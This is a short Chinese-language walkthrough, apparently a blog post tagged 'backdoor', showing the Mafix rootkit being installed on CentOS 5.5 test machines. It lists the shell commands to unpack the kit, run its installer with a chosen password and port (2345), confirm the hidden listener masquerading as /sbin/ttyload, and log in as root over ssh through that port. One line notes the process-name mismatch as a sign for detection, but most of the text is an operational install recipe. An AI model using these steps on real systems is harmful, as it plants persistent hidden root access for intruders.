z0nek


测试机器:
CentOS5.5 32位和64位系统测试成功

[root@localhost mafix]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux

[root@localhost tmp]# tar zxvf mafix.tar.gz
mafix/
mafix/mafixlibs
mafix/mafix
mafix/root
mafix/HOW-TO

[root@localhost tmp]# cd mafix

[root@localhost mafix]# ls
HOW-TO  mafix  mafixlibs  root

[root@localhost mafix]# ./root hehe123 2345
// 其中 hehe123 为密码,2345 为后门端口

[root@localhost mafix]# netstat -anlp | grep 2345
tcp        0      0 0.0.0.0:2345        0.0.0.0:*        LISTEN      15690/ttyload

[root@localhost mafix]# ps axu | grep 15690 | grep -v grep
root     15690  0.0  0.0   2280   508 ?        Ss   22:20   0:00 /sbin/ttyload -q

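[root@localhost mafix]# ll /proc/15690/exe
lrwxrwxrwx 1 root root 0 Jun  8 22:22 /proc/15690/exe -> /tmp/sh-AIN2LD3APKJ (deleted)

注:ps 显示的进程名是 /sbin/ttyload,而 /proc/15690/exe 实际指向 /tmp 下一个已被删除的文件;进程名与实际可执行文件不一致,是排查此类后门时值得关注的迹象。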

登录后门:

[root@vincent tmp]# ssh 172.16.100.154 -p 2345
root@maf!x:/root$ whoami
root


标签:后门
